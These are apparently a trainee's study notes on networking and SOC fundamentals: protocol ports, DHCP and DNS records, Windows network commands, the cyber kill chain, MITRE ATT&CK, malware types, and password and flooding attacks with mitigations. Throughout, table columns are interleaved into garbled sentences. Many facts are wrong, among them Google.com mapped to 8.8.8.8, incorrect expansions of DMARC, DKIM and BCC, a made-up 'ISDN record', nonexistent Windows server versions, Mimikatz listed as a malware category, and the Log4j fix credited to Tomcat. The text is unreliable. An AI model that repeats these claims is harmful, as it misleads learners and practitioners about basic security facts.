For network deiscovery and also managing and maintaining of all the network
devices we will use SNMP procool
There are 3 diffrerent types of versions under SNMP
1) SNMP version 1 ( Clear text and plain username and password)
SNMP ( Simple network management 2) SNMP version 2 ( Clear text and plain username and password)
protocol) 3) SNMP version 3 ( Encrypted username and password) 161
LDAP ( Light weight directory access To integrate with AD and to know about tracebility of end users whenver any
procol) / AD security incident its happend 389
LDAPS ( Light weight directory access To integrate with AD and to know about tracebility of end users whenver any
procotl security) security incident its happend in secureway 636
RDP ( remote desk top ) To log in one windows OS to another windows OS 3389
Web browwsing to access any websites or applications ( Data transfer in
HTTP ( hyper text transfer protocl) clear or plain text with out any encryption) 80
eb browwsing to access any websites or applications in secure way ( Data
HTTPS (Hyper text transfer protocll transfer in encrypted channel an additonally it will provide authencity,
security) authorization, integrity , non repudiation and encryption) 443 / 8443
syslog ( System logging) To store system logs we can use syslog 514
SMB ( Server message block ) For mesaginf pur;pose or coomunication purpose 445
IP SEC ( Internet protocl, security ) It can be used for VPN connectvity 500
Connection intiaon in betwene two end users and it is a telecome service
SIP ( Session intiation protolc) protocl 5060 and 5061
ICMP ( internet control mesage p[rocol) It can be used for messaging purpose There is no port number
MS SQL ( microsft SQL ) It can be used for DB confioguration 1433( tcp) 1434 (UDP)
Outdated or
SSL (Secure soicket layer) Web brwosing 443 leagcy
TLS ( Trabsport layer security Web browsing with secure way 443 It is leatest
1) Static IP Assgning ip address static or fixed one is called as Static IP

Advatanges
1) To maintain high availbility oincase of servers without impacting any business Server LAN ( For all the servers)

Drawbacks or disadvatages
1) Mainting the DB is complicated and also complex
2) One dedicated human being or human intevetion is required to main the database
3) Lot of collisions or conflict will occur if we are ssigning the same ip address to
muliple devices with out maintaining the priper inventory

Note: To maintain automatic ipmaddress allocation and also less time consuming and
additionalywothout proper configuration related issues or conflicy related issues we
can for dynamic ip allocation ( Using DHCP server)
Note2: For servers we will assign static ip because of upgarde and availabiltiy issues
at the time reboot and also upgarding

DCHP server Dynamic host configuration protocol

DHCP server will allocate ip address automatically with out any humen intervetion
using DORA process with out any conflicts and also diffculities with in specific time
period( Lease time)' using wife and also using LAN

DORA process
1) nWhenver emnd user is conencting trhough either wifi or LAN network as a
DISCOVERY broadcast request it will go to each and every system is connected in
the Nework
2) DHCP server will respond back as OFFER With I AM THE DHCP server how can i
support as a response ?
3) End use will REQUEST ip address for temporary time period either though LAN or
WLAN
4) DHCP server will rpvide ASCKNOLEDGEMENTby valding which empty free
interfaces of IP address is avalbile and it will assign IP address end user machine
autimatically with spfic time period ( is leaed time).

Port number for Client and DHCP server for communciation

67 and 68

Use case for SEcurity incident 1) When the security incident its happend and details are missing in the security alert,
investigatyations if we want to know who has done want we need to check with AD

2) DNS server Domain name system or server

It will convert or resilute or map domin name into IP address and also ip address into
domin name
Example: Google.com ---- 8.8.8.8
Google.com -----8.8.4.4

Why we have to map domian name into ip address?

1) user friendly ( Easy remebering)
2) Due to security reasons ( Organizations should not expose private or public ip's
public or internet)

Domain names alternative names are FQDN - Fully qulified domain name

Which server or protocol will support both TCP and udp connections ?
DNS

Every oraganizzation it will maintain 4 DNS servers

Internalor Private DNS servers Primary
Secondary or back up High avability
Public DNS servers Primary
Secondary or back up

DNS records
For converting domain anme into IP address or vice versa we have to create coule of
records those records called as DNS records'

There are couple of DNS records

1) A record It will convert domain name into IPv4 address

It will convert or rrsolute domain name into IPv6

2) AAAA record address

It will convert IPv4 and IPv6 address into domain

3) PTR ( Reverse pointer ) name

It is opposite of A and AAAA records

It will convert one form of webbrowser into some

4) CNAME ( Canonical name) other from web browser is called CNAME record

gmail.com it will be converted into https://www.

gmail.com

For sending and also receving th email we have to

5) MX record ( Mail exchanger ) creat MX record
Every email contains couple of important
tenchincal parameters . Those paramters are
1) SPF ( sender policy framework)
2) DMARC ( Domain message authtication reciove
code)
3) DKIM ( Domain key identification message)
4) Doamin keys ( Public keys)
5) Return path
6) IP adddress
7) Domain name

To make international calls have to create one of

7) ISDN record ) Integrated single digital network) the record, that record is called as ISDN record

Internal code -- 00 or +
Countr code --- 91 (India)
1- USA andCanada
47- Germany
971= UAE
Phone number
For example in India = 0091xxxxxxxxxx

It will provide DNS server of the HOST infor like

8) Hinfo record ( Host info record) RAM, CPU, Processor , SDD etc

It will provide DNS administartor of authority details

loike name, contact , email address, info abvour
DNS zones, and also confugiring different types of
9) SOA record ( Sate of authority) DNS servers

This record dcan be to configure main domain and

sub domains and also based on geograpchical
10) NS record ( Name server ) location

Geographical location
Yahoo.com ns records USA
yahoo.co.in NS1- india
yahoo.co.uk NS2- UK
yahoo.co.sg NS3- UAE
yahoo.co.au NS4- Australia

Doamins and sub domains

google.com Nsrecord
gmail.com NS1
Gmaps ns2
youtube ns3
google meet ns4
 11) TXT recrd ( Text record) For texting messages we can configre TXT record

DHCP Dynamic host ocnfig protocl

DNS Domin name server
IPAM IP address managemnt

DHCP, DNS and IP address amanagement (

DDI solition IPAM)

DDI vendors or tools

1) Mivrosoft
3) Infoblox
4) IBM
4) HP

Noite: Gather the domain with whom organization

doing business by contacing all the stake holders
and do those business domain o ly whitelisting DNS filtering ( Whitelisiting or blacklisting of the
remaining all other should blacklisted domains)

It will provide directory of all the systems or

computers information like LT, MAC, WORK
3) Active directory ( AD) STATION, DESK TOPS and servers

Groupiong of similar type of eompoyees int eh

AD groip organization is called as AD group

When security team has to contact AD team or windows admin team or sys admin ? 1) Intrgeating AD or LDAP with any security tool
2) When the security its happend we dont know
about tracking or tracing of the end user at the time
stamp of incident its happend who is connected to
x ip ? 6 Malware
3)Integraing of AD logs to SIEM tool Alert Use rname Ip address Time stamp
10.10.10.1 6pm IST
It is on inbuilt or physical data center or onpremise
Types of AD Onpremise AD location AD
Depending on which cloud service provider we
have choosen we have to create AD VM or EC2
2)Cloud based AD instance along with AD groups

It is centralised authtication and authorization

4) Domian controller ( DC) server

Example domians are

1) Infosys.com
2) Fcaebook.com
3) Accenture.com
4)Capgemini.com

Note: proibability of end user authication 1) Succesful authitcation--- Event id - 4624

2) Failre authitcation ------4625 Audit logs

DB server it will main all the collection of the data

od enttie orenganation data ( End users,
5) DB ( Dtabase server) condiftential or org data )

Data = collection of information

Types of the data

1) Critical
2) Non crtical data

Organization point of view

Data classfication types
1) Internal pr Private
2) Resticted
3) Public or external

In the case of personal data , data types are

1) PII data ( Personal indefible information) GDPR - general data protection regulation
HIPAA- health insurance portability accountability
2) PHI ( personal health information) and ACT '

Note : Most of the data bases will support query

lanugaue
1) SQL- Strctutred query lanugaue
2) PGSQL - Postgresss structured lanugae
3) AQL- Aerial query laguage
4) KQL- Kusto query lanu=guage
5) MS SQL

Vednors or tools
1) Microsoft
2) SQL
3)) Oracle
4) Postgreaa
5) Mongo DB
6) Cassnadra
7) SAP
8) Grid gain
9) Couch base

6) Windows servers
Windows OS on the end point side (LT,WS, DT) Windows server list
1) Windows XP 1) Windows 2008 R1 and R2
2) Windows vista 2) Windows 2010
3) Windows 7 2) windows 2012
4)Windows 8 and 8.1 or windows 8.x 4) Windows 2016
5) Windows 9 5) Wndows 2019
6) windows 10 6)Windows 2021
7) windows 11 7) windows 2022

Under unix OS , there are different type sof

7) Unix servers flavours of OS
1) RHEL RHEL 1.X TO 9.X
2) Cent os Cent os 1x to 10.x
3) Ubuntu
4)Feroda
5)SUSE
6) Docker
7) Container
8) Amzon linux

Applicztion server can be to host any application or

8) Application server or Web server website

Applictions can be accessed by either internal

employees or external public
For internla emplyee side Time sheet update
Income tax eclarion
HR portal
Pay slips download
Based on roles and res;obilities
internalapplicsation
For external applications Public por cusotmers or c;lient or vendors
Job seekers'

Application 3 tier architecture 1) User layer - Front end

2) Business or logical layer-
3) DB layer

Network 3 tier architexture ( Cisco) 1) NGFW or FW

2) PROXY or web gateway or Secur web gateway
3) NIDS/NIPS
 It is centralised file server and it can manage
maintain all the files of different stake holders of
the organization ( ML.AI, app devlopment, testers,
9) File server hr, legael, NOC, soc , Security etc )

Note: File server manager or adiminstrator based

ont eh team eisde he can provide access or grants
or persmssions to access the files

10) SMTP server or email server or exchange server o UCS ( unfied communication To send emails and to recive rthe emails we can
server ) or 0365 or outlook use SMTP server
Port number : 25

Every email contains couple of tenchincal and non

technical paramters. Those parameters are

Technical
1) Spf (Sender policy framework)
2) DMARC( Domain message authication recive
code)
3) DKIM ( Domain key indeitication message)
4) DK ( domain keys)
5) Rettun path
6) IP address
7) Doamin validation
8) Header analyser
9) URL link
10) Malware attackment

Non tecnical
1) Subject line
2) message ID
3) CC- carbon copy
4) BCC- Business carbon copy
5) Body of the content

It is an authiction mechnism it can be used to

SPF( Sender policy framework) prevent phsing emails from cyber criminals

It si combination of SPF and DKIM . It can be used

DMRAC ( Domain message ahtication code) for protecting of all the phising email s

it is authication protoclol , it can be used provide

digital signature to ake sure that oidentity of the
end user and also authenticity, confidentiity and
DKIM ( domain key identification message) encryption

Retrun path

Network Commands

Ip address To verify ip address of a system

syntax
cmd>ipconfig
cmd>ipconfig /all

2)MAC ddreasa Top verify or findout MAC address of the system

sysntax
cmd>getmac

To verify whether the peer device up or down , running not running , active or passive
3) Ping command , online or offline

syntax
cmd>ping x.x.x.x
cmd>ping hostname.com

Ping command it will be used by ICMP protocol( Internet control message protocl)
It has type 0 to type 255 messsages

Type 0 = Desntination reachble or Echo reply

Type 3= Denstination unreachble

Note : Therer aare attacks two possible for ping command side
1) Ping flood atatck or ICMP flood attack Flodding of ICMP packets
2) Ping of death Atatcker will send oversized packet

4 Nslook up It will convert domain name into ip address or ip address domain name

One of the system got compromise dby malware

Note: Whenver any security incide is triggered and securty alert does not comtain
host name or ciumpter name , how to to verufy host name of th system or FQDN of th
alert? Time stamp : 26/09/2024 7am
1) Go to cmd prompt and use nslookp ny providing targted ip address Ip address : 10.10.10.1
2) Please contact ad team to get the details Hostname NA
edr : Block
5) Hostname How to verify the host name of the computer File name : test dll.
file : c:programmfiles/users/doenloads/test.dll
syntax hash value abcd1011de0121
cmd>hostname OS : wdinwso
dmd>ipconfig /all

It can be used to idetify what are all the ports running and what are all the ports are
6)Nestat close d

syntax
cmd?netstat

It can be traced in beween source and destination how many hops are availba along
7)Traceroute with the time
Interview question
syntax
cmd>tracert

It can be uded to identify how many hops are available in betweens ource and
8)ptahping destination

cmd>pathping x.x.x.x
cmd>pathping hostname.com

9) ARP to verify arp entires in any particular system

syntax
cmd>arp -a
smd>arp -g
cmd>arp -s
amd>arp -d
 It is alogical or pictorial representation or blur print where
deploye what type of devices in the digramtic or
Network architecture diagram architecture way is called network architecture diagram

Couple of framework for design architecture of the networ

k
1) SABASA
2)TOGAF
3)Cisco

Server security or Incra security

1) How to protect severs ?
2) VM ( regular patch updates )

How to protect severs ? 1) Strong or complex passwords

Uppercase
Lowesercase

A Numberical number'
spcialcharacter
Minmlenth should be 12-16
characters
B) MFA ( Multifactor authiction)
C) Defaukt passwords should not use
D) Consecutive password we should not
repeat
E) 90 days once once we have to change the
password
Base don the user actiosns or
2) Implement RBAC controls talsks or roles
Intial security configurations or
3) CIS hardening bench mark implementaions
4) Regular patch updates
5) regularly or monthly once run Vulnerability
scans and patch those vulnerabilities
6) implement AV / EDR solution
7) Implement DLP solution
8) Encrypot the Disk ( Disk ecnryption) Data at rest level of the encryption
9) Have to implement FIM solution
10) All the servier logs should integrated to
SIEM tool and create rule for trggeing the
alert when ever any malcious actvity its
hppend

2) End point security End point protection ( End Point - End use rmachine or emaployee machine or
EPP ) host machine
Example of end point sare
1) LT
2) MAC
3) WS
4)DT
5) Servers

For protecting or poins or host machines using different

types of oslutins or tools called as End point protection
end point security

Example of end point security solitons are

1) AV/EDR/XDR
2) DLP
3)HIDS/HIPS
4) Data rest encryption (End point)
5) FIM \
6) MDM

The traffic is going away from internal or trust to external

or publc or untrust or internet is called outbound ot
Outbound traffic / Outgoing traffic outgoing traffic

The traffic si coming from external or untrust or internet or

publc to internal or trust or private is called as inbound
Inbound traffic or incoming traffic traffic or incoming traffic

If we are uing cisco routers and

Co,mbination of both inbound traffic and outbound tarffic siwtch es in our organization is
Netflow data is called as netflow data Note :Netflow terminoloy porovided by Cisco called netflow data Cisco
S flow or yes
HP routers and switches flow data
Juniper routers and switches J flow data
Ayava routers and switches Netflow
IBM routers and switches Netflow
HP routers and swoitches Netflow

If we want protect atatcks from network or permiters aisde

we can use couple soluntions to safegaurd or network or
Network security or Paramter security orgnization is called Network security solutins

1) NGFW
2)NIDS/NIPS Network 3 tier architecture
 Network 3 tier architecture
3) Proxy ( Secure web gateway)

For phisng email protection i, we will deploy or we

Email security or email gateway wimplment email security solution or email gateway
Email Gateway it willact as gateway or bridge between
external phising email atatckers to our internal users

Application ( Product or mobile or OT, IOT,

IIOT ) security
1) WAF
2) Secure SDLC life cycle \

Information security Ovwer all orginzation security

1) GRC ( Risassesmnt , auding and complinaces)

2)BCP/DR
3) Incidne tmanagement

Whatver on premise controls deploys same way we have

to deploy security controls in the cloud as well is called as
Cloud security cloud security

To protect or to safegaird entire orgnization data or

information end points or servers or databased or network
or cloud or application etx 24*7*365 days is called as
Cyber security Cyber security

Types of zones 1) Internal/trust 100

2) DMZ / DMG 50:50:00
3) untrust / Public/external/Internet Cisco 0

DMZ/DMG zone Dimilitirized zone

It will act as a boundary trust zone and untrust zone

Nmap tool

Nmap another name is ucalled as Zeb=nmap

To identify what are all the ports opended ,
what are services or application or porceses
Nmap full form is Network mapper running on against each and evrry port

Running scan against all the ports and

idefyting what are all the ports are opned ,
what are all the ports ar closed and what are
all the ports are filtetreded is called port
Port scanning scanning

Latest stable version of the Nmap is 7.95

1) Cyber kill chain process Cyber is kill chain process is offensive mechanism
It is a step by step process or phase by phase bapproach how the attackwer will
Defintion do hacking for the targeted machine is called as Cyber kill chain process

Cyber kill chain process steps are or phases are

1) Recon or recnnissance
2)Weaponization
3) Transport/Delivery
4) Installation
5) exoloitation
6) Command and control
7) Actions on Objective

In this phase atatcker will gather information or selction of the traget

1) Recon or Reconnissance or targted machine Port scanning
In this phase atatcker will use malcious scipts or url or malcious code
as weapons and he iunject in tho either input side or may be in the
2) Weaponization document or may be using macros Vulnerbaiity scanning
Inout validation
3) Transport / Delivery Attacker will deliver to payload to the targted machine or system Bribing internal employees
Phshing email '
In this phase atatcker will monitor coninuoulsy and he will idenfy any
vulnerability or wekness existing and he will install malcious code or
4) Installation payload Maze 2020 April
May 2021
5) Exloitation Once atatcker will identify weakness he will aplit the atatck

Attacker will contril remotle targted machine and he will operated as

6) Command and control ( C2C) or C2 command control and remote control

Finnaly atatcker will gain aunthrorised access or sentive data

exposure or dat breach or data violation data exfilteration adn atatcker
7) Actions objective ( Goal ) needs or bit conins

2) MITRE ATT@CK framework

A= Adversary ( Kacker or hacker or intruder or threat actor)
T= Tactcis
T= Tecnquies
CK= Knwledge base od Data base

It is centralised base atatcker will use TTP ( Tactcis, techniques and also
procedures) how the atatcker will do hacking also it will provide defensitve
Defintion mechanisms like prevention or solution mitigation or safegaurd
MITRE ATTACK framework is a combination of both Offensive and also
Defensive mechanims
Smal scale industry 0-1000
MITRE attack frame work can be used by Blue team ( SOC) team , Red team ,
Threat hunters , malaways analysis , cyner security anslts sand also reverse
enginerrign teams Medium scal industry 1000-10000
Enterprise ( CMM5 , Big data , MNC ) 10000+

Tactics === 14 tactics Static in nature

Techniqies === 500+ Techniques and procedures are dyanmic in nature because how
Procedures = 1000+ attacker will do hacking

Tactics
1) Reconnnaissance 4 techniques
2) Resource development
3) Intiall access
4)Execution
5) Perstistnce 3
3 1) Abuse Elevation Control Mechanism, Setuid and Setgid, Bypass
User Account Control, Sudo and Sudo Caching, Elevated Execution
5) Privilegse escaltion with Prompt
7)Defenase evasion
8) Credential access
9)Discovery
10) Lateral movement 3
11)Collection
12)Command & Control
13) Data exfilteration 3
14) Impact

Types of Network/Cyber/OWASP TOP 10 /

Wireless
1) Authtication failure
2) Malware categroy
3) Spoofing
4) Flooding category
5) OWASP TOP 10
6) Wirless or Wifi
7) Others/Mislaneous approximate 70+

1) Malware categroy
Malware Malcious software
Malware will developered atatcker or intruder or hacker or adversary
or threat action for malcious activity or abnormal actvity or illigitmate
activity or suspicious activity , So that atatcker will gain unathorised
access od data exfilteration or sentive data exposure or data breach or
data violation

Malware mechanims are File oriented malware

Fileless orinted

Malware will happen thorugh using hash value and also through file
File oriented malware format (n. dll, .doc,.ppt, .csv, .exe, .htm etc) Hash value
Fileless oriented malware It will occue without any file file using process execution
ex: Lolbins ( Living of the land binaries)
Pwershell or python or perl
WMI
Windows regsitry keys

Sympatoms of the malware

1) System performance issues
2)System slowness
3) CPU utlization will reach very high
4) RAM utlization will reach very high
5) BW utlization will reach high
6) Automatic restarts
7) Automatic shutdown
8) Cursor movment

Doanloading the malcious files from

Sources of the malware 1) Drive by downloads websites or applications
2) Phsing email malware atatchments
Pendrive, USB, memory stick or External
3) Remivable devices ( haddisk

Malware types are or Malware atatcks are 1) Virus

2)Worm
3)Trojan
4)RAT ( Remote access trojan)
5) Spyware
6)Adware
Mitgations:
7) Keyloggers or key strokers or key logging
1)AV/EDR/XDR
8) Mimikatz 2)NGFW
9) Logicbomb 3)Mlware analysis tools
4) Email gateway or email security
10)Rootkit solutions
11)Ransomware
12)Botnet
13) Previlge escaltion
14) Zero day
15) PUP ( petinial unwated program)
16) hacking tool
17) Lolbins

It is malcious software program code and atatck erwill inject into

targated machine , soi taht atatcker will compromise based on cyber
kill chain process and atatcker will gain auntorised access or sentive
1) Virus data exposure
Virus is a selfreplication with in sinsgle asyatem

Mitigation or Erdication or prevention Mitgations:

1)AV/EDR/XDR
2)NGFW
3)Mlware analysis tools
4)) Email gateway or email security solutions
 It is malcious software program code and atatck erwill inject into
targated machine , soi taht atatcker will compromise based on cyber
kill chain process and atatcker will gain auntorised access or sentive
2) Worm data exposure '
If one system is getting comprimised by WORM through networking
protocols other system will get comprmised
Note: It is self replication with in a entire LAN

Mitigation or Erdication or prevention Mitgations:

1)AV/EDR/XDR
2)NGFW
3)Malware analysis tools
4)) Email gateway or email security solutions

It is a mclaious fsoftware program code atatcker will inject into tragted

machine, after idnefying vulnerbaility in the system based on cyber kill
chain procress atacker will encrypt either sisnlge or group of files or
entire OS( operation system) with with encrypted key. Now attacker
will ask either in the form of money or bitcoins or digital currentcy , if
3) Ransomware we dont make payment atatcker will delete the files

Ranaomsware atatck entered into the marker in 2017 , there are

series series of the atatcks are happend in the month of may or june or
july or august.
Intially ransomware atatck names are Wanna cry and Petya
There were more than 6000 + ransomware attacks were in the news .
Very famous Ransomware attacks are 1) Wanna cry Eternalblue
Eternal Blue and Eternal
2) Petya romance
3) Kaseya Regila
4) Akira China dragon
5) Maze Cha cha
6) Lockbit 3.0

Mitigations
1) Regular back up s
2)AV/EDR/XDR
3)NGFW
4)Malware analysis tools
5)) Email gateway or email security solutions

Attacker will develop malcious software program code and he will

inject into tagrted machine and as per cyber kill chain process atatcker
will compromise the system then atatcker credentials ( Password
cracking) and also attacker will gain aunthorised access and sensitve
5) Mimikatz data exposure

Mitgation
1)AV/EDR/XDR
2)NGFW
3)Malware analysis tools
4)) Email gateway or email security solutions

6) Spyware
Spy = secrent agent

It is a malcious software porogram code will be devloped by atatcker

and will inject or inseert targted machine and secrely he will manitor or
gather all the confidential accessing by end user . So taht attacker will
gain aunthorised accesss or senstive data exposure

Mitgation
1)AV/EDR/XDR
2)NGFW
3)Malware analysis tools
4)) Email gateway or email security solutions

Key logger is amalcious software program code atatcker will develop

and he will isnatl in the tagrted machine based on the cyber kill chain
process ahenever weknes is dienfied in the tragted machine attacker
wil exploit and insuch way atatcker will comprmise targated machine.
Now whatver end user entring keys , atatcker will capture all the
7) Keyloggers or key logging or key storing confidential
Examplae
PII daata (Personal idneifble information) GDPR compliance
PHI
Orgaization server, application, db , cloud etc

Mitgation
1)AV/EDR/XDR
2)NGFW
3)Malware analysis tools
4)) Email gateway or email security solutions

Bypassing the authication or another of the way authication is called

8) Backdoor as Backdoor

Backdoor always will work with other atatcks combinations

for example:Backdoor+Trojan
Backdoor+Virus
Backdoor+Worm

Mitgation
1)AV/EDR/XDR
2)NGFW
3)Malware analysis tools
4)) Email gateway or email security solutions

It is malware and it will act as a some it will do beficiry to end user but
from the atatcker point it is abnormal or malcious activity and atatcker
9) Trojan will gain unathoried access or sensitve data exposure

Mitgation
1)AV/EDR/XDR
2)NGFW
3)Malware analysis tools
4)) Email gateway or email security solutions

It is a maclious software program attacker will devlop and inject or

insert into tragated machine and absed cyber kill chain atatcker will
compromise once he will idneify weakness , soathta ttacker control
remotly or virtully using command and control , Insuch way attacker
10) RAT ( Remote access trojan) will gain aunthorised access or sensitved aat exposure

Mitgation
1)AV/EDR/XDR
2)NGFW
3)Malware analysis tools
4)) Email gateway or email security solutions

Undocumented library or package from vendor and also it does not

11) Zero day atatck have solution or patch from the vednor is called zero daya ttack

Note: Zero day is applicable to either commericial or open source or

library or package

Examples of libraries or packges or services can b installed in in either

application or product or mobile or any asset ( Servers, dbs, end user
machines)
Examples libraries and packges or TPS ( third party software)
1) Open sssl
2) Apache tomcat
2) Spring boot framework
4) Log 4j
5)Oracle java
6)Open JDK
7)Pythin
8)Powershell
9) Reactive js

Open JDK 21 2 days 22 version

Application development

How to fix zero day vulnerbility ? Mitigation ?

Whenver any zero day atatck will be there in the new we will below
steps
1) Temorary fix ( Partail fix)
2) Permanaetn fix ( Venodr release the patch )

Please gather the business ip's and

bussiness domains from network engineers
or network administatirs or client and do
blacklisting of domains and ip's in the
1) Temporary fix rpermiter level
Implement ip tables configurations using By implmenting this one
private to private or node to node we are minimizing the
coomunication only via private ips risk

Once the vendor is relasing the ne wpatch

our internal stake holders will test the
testing environment and finally if eevrything
is succeful , internal stake hoilders will
raise change request using change
management process they will implment in
2) Permanenet fix the production environemnt
 LOG 4J - DEC19 2021 ---0.0 to 1.0
December 21 st Apache tomacat vendor is
relased the patch
1og 4j 1.2
1log 4j 1.4 December 22nd

Examapole famous zero daya atatcks are 1) Solarwidns supply chain attack
2) FY managament consoleexposing to the
publc
3) Log 4j
4) Microsoft remote code execution
5) Avanti VPN pulse secure zero day
vulnerbility

1) Please run vulnerability scand and verify

Note: Whenver any zero day atatck will be there in the news , what is there any oracle / Java TPS we are uing
security analyst roles and repsobilities ? in ournorganization in the report
Option 1) Incase TPS we are not in using in
our orgnization , there is no impact
tomorganization
Option 2) Incase we are using TPS
whatever it siavalble in the news we whave
to fix two wasy using temporary and also
permantnent fix

12) Botnet
Bot= Robot
Net= Internet or Network
Botnet= Robot network or Robot internet

Attacker willinject or will insert malious software program code via

internet or public network to the local area network machines via
pshsing emails or others sources of the malware. Finally atatcker will
compromise the taragated machines and he will control all the
machiens are connected in the LAN
Who ever is controlling the machiens are assets or compirmised
system is called as Bot hearder or atatcker and whatver machine sor
compormised systems called as Bots or zombies

Mitgation
1)AV/EDR/XDR
2)NGFW
3)Malware analysis tools
4)) Email gateway or email security solutions

13) Adware ( Adavertisement software) Adaware full form is advertisement software

Atatcker using pootential unwated proigrams or malcious url links or
pop ups he willinject malware into the pop up or pup's or
advatsertimesent sofwatres and whenever end used is clicked
malware will in the installed end machine or tragted machine based
cyber kill chain process. Insuch way atatcker will gain unatuhorised
access or sensitive data exposure '
Example : PUP, PUA, Pop up's , malcious url links

Mitgation
1)AV/EDR/XDR
2)NGFW
3)Malware analysis tools
4)) Email gateway or email security solutions

14) Rootkit attack

Every system or evey computer has couple of account. Tjose accounts
are
user Every emeployeee in the org has user level of the access for the
end point system
Service account- To do the regular patch updates, security patch
updates and taking the regular back ups
Local admin accoint: To install any sofwate or tool we can use local
admin
Adminitirator root ==This account has highest previlge or access tot
ake care of adding or delting or modyfying od updating of the data and
full control access

Root= In the unix terminlogy highest preilge or access or permission is

called as root
Kit = software tool

Atatcker will inject or insert malciocious software programm code and

he iwll gain root level access and once he will gain root level of the
Root kit attack def access he will perform below operations
1) Changing passwprds or admin credentilas
2) H ewill delete existing accounts
3) He will update or modify or change add new configuration files
4( He can chage the resgitry keys

Mitgations
1) RBAC
2) I plemeing of AV/EDR./XDR
3) Implement HGFW
4) Implement Email security solutions or email GW
5) Implamanet anit malware or malaware anaylis sotol '
6) Memory dumping analysis

Hacking tool is a piece of software file and attacker will inject this
malicous software file into the tragted amchine and then once attacker
will identify the weakness atatcker will exploit the malware and insuch
way atatcker will gain aunthorised access access or sensitive data
16) Hacking tool exposure

Mitgation
1)AV/EDR/XDR
2)NGFW
3)Malware analysis tools
4)) Email gateway or email security solutions

attacker will use pre defined or legitmatimate inbuilt OS coomand or

porcess for malcious puporse. Lolbins can be used for illimitiate
activity and atatcker will gain aunthorised acecss or sentive data
17) Lolbins exposure
Lolbins are file less oriented processes
Example lolbins are
1) Powershell / Perl
2) WMI
3) PSExec
4) Windows registry keys
5) MS build
6) MASHTA ( microsoft scripting host)

Attacker will inject or insert malcious software program into the tragted
amchine and he will defien data and time when the vulnerability
idenified ( AV/EDR is sleeping or unknown , inactive, security patch
updates are not happing) , and finally data and tiem condition will
matched atatcker will exploited the malware . Attacker will gain
18) Logicbomb ( APT ) aunthorised access or sensitve data exposure

Mitgation
1)AV/EDR/XDR
2)NGFW
3)Malware analysis tools
4)) Email gateway or email security solutions
5) Health check up ( Always aAV/EDR/XDR should be active)
6) Regular secuity patch updates
Investgation - End point security
Policies - SIEM
Note : All malware category of the atatcks orventive solutions are EPP tools Log integration methods SIEM tool tool SIEM tool alerts
1) IBM Q radar Whenver atatcker will do abanormal or amclious or
2) sPLUNK Coreelaion supicious of unathorised activity for malware
1)AV/EDR/XDR 3)Logrhythm rules catorgy, based on the correlation rules / use cases
2)NGFW 1) Hardware based 4) Azure sentinel or conditions configured for every malware category of the
3)Malware analysis tools 2) Software 1) Syslog 5)Exabeam algorithms atatck alert will triggered. A s a SOC team we will
4)) Email gateway or email security solutions 3) Cloud based tool (SaaS) 2) API toke method 6)Securoinix or polcies incident investigations '

2) Authitcation failure category

In this category of the atatcks atatcker will use trail and error method or
guessing the passwords or porbability so athat will atatcker will compormise
accoutns / credentials of the end user ( End point, network, application, server,
DB , Application etc) and atatcker will gain unauthorised access or sensitive
data exposure

There are different atatcks will under auythication failure or autication success
by the atatcker. Those are
1) Dictionary atatck
2) bruteforce atatck
3) Pass th hash
4) Password spray atatck
5) rainbow table

Attacker will use trail and error method or common used usernames
and passwords to guess passwords, soathta attacker will comprimise
systems , insuch way atatcker will gain aunthorised access or sentive
19) Dictionary atatck data exposure

Example of commonly used dictionaries are

1) Demo
2) Admin
3) Password
 4)Password@123
5) 123456789
6) First name
7)Lastname
8)Surname
9) Lovername
10) Mobile number
11) DoB
12) TCS@2024
13)IBM@2024

Mitigations
1) Impelemtn strong or complex password polcies
A) upercase
B)lowercase
c) Spcial character
d)number
e) Min lenth 12-16 character
2) MFA ( multifactor authitcation
3) Account lock out policy
4) Consecutive passwords should not use
5) Password rotation for mothly once or querterly one

Atatcker will use trail and error method or guessing the password
using probability , so that atatcker will gain aunthirsed access or
20) Brute force attack sentive data exposure

Mitigations
1) Impelemtn strong or complex password polcies
A) upercase
B)lowercase
c) Spcial character
d)number
e) Min lenth 12-16 character
2) MFA ( multifactor authitcation
3) Account lock out policy
4) Consecutive passwords should not use
5) Password rotation for mothly once or querterly one
6) Default passwords should not use

Attacker will use trail and error method and he will spray same
username and password aacross the multiple systems to guess the
credentials , soathat atatcker will compromise either sisngle system or
21) Password spray multiple systes called password apray atatck

Mitigations
1) Impelemtn strong or complex password polcies
A) upercase
B)lowercase
c) Spcial character
d)number
e) Min lenth 12-16 character
2) MFA ( multifactor authitcation
3) Account lock out policy
4) Consecutive passwords should not use
5) Password rotation for mothly once or querterly one
6) Default passwords should not use

Attacker will use trail and erroe method to guess the password using
hash value, so that atacker will gain aunthorised acess or sentive dat
23) pass the hash atatck ( Brute force atatck) exposure is called as Pass the hash attack

Example
1) Password@123 = d00f5d5217896fb7fd601412cb890830
25c2c9afdd83b8d34234aa2881cc341c09689aaa
Sttacker will use trail and erroemethod to guess passowrd using shal
24) Rainbow table attack (Passwordspray attack) value for more than ome syste is called as raimbow table atatck

S.NO User name Password Hash value

1) 1 x Passowrd Both chars and numbers
2)2 y Paddord@123 Both chars and numbers
3)3 z Weclome Both chars and numbers
4)4 a welcome@123 Both chars and numbers

Mitigations
1) Impelemtn strong or complex password polcies
A) upercase
B)lowercase
c) Spcial character
d)number
e) Min lenth 12-16 character
2) MFA ( multifactor authitcation
3) Account lock out policy
4) Consecutive passwords should not use
5) Password rotation for mothly once or querterly one
6) Default passwords should not use

Flooding category (b Attacker willsend huge or large numbe os the

requests to targted macine)
Attacker will send largue ir hume or more number of the requests to
trageted machines, so that targted machine will become aunavailble or
damged or crashed or interrruoted , this particulat attack is called as
Flooding of the atatck
exampes are
1) TCP ( Syn flood attack)
2) UDP
2) ICMP or Ping flood atatck
4) ping of death
5) MAC flood attack Aavailbility offues for the flooding category
6) ARP flood atatck
7) RARP flood attack
8) DoS
9) DDoS

Note : floow is equivalent or more number of the rewquests or large

nuber of the reauest or flooding of the requests '

Note 1) Flloding of the atorgiries as per CIA triad from the orginization
it will represent availbility issue

mitgations
1) Inpareallel to ISP routwr we have to deploy ANTi DOS and anti
DDOS tools
2) define rate limilt or thorttling in permiter n trustor internal zone (
FW, proxy, NIDS/NIPS, backend servers)
3) Implement NDIS/NIPS locies on te network ;level t
4) In the backed server /trust or intenal have to imp,etn ip tables
5) Implement AV/EDR/DLP./ encryptio data rest level and also data
transit level

Attacker will send flooding TCP or SYN or huge or large number of

the the requests to trahgted machine as per cybe rkill chain process so
that atatcker will main business disruption or busines sor iutage or
availblity issues based on CIA traid, sothat wttacker will compormise
25) TCP flood atatck ( SYN clood atatck) tragted machine

Mitgation
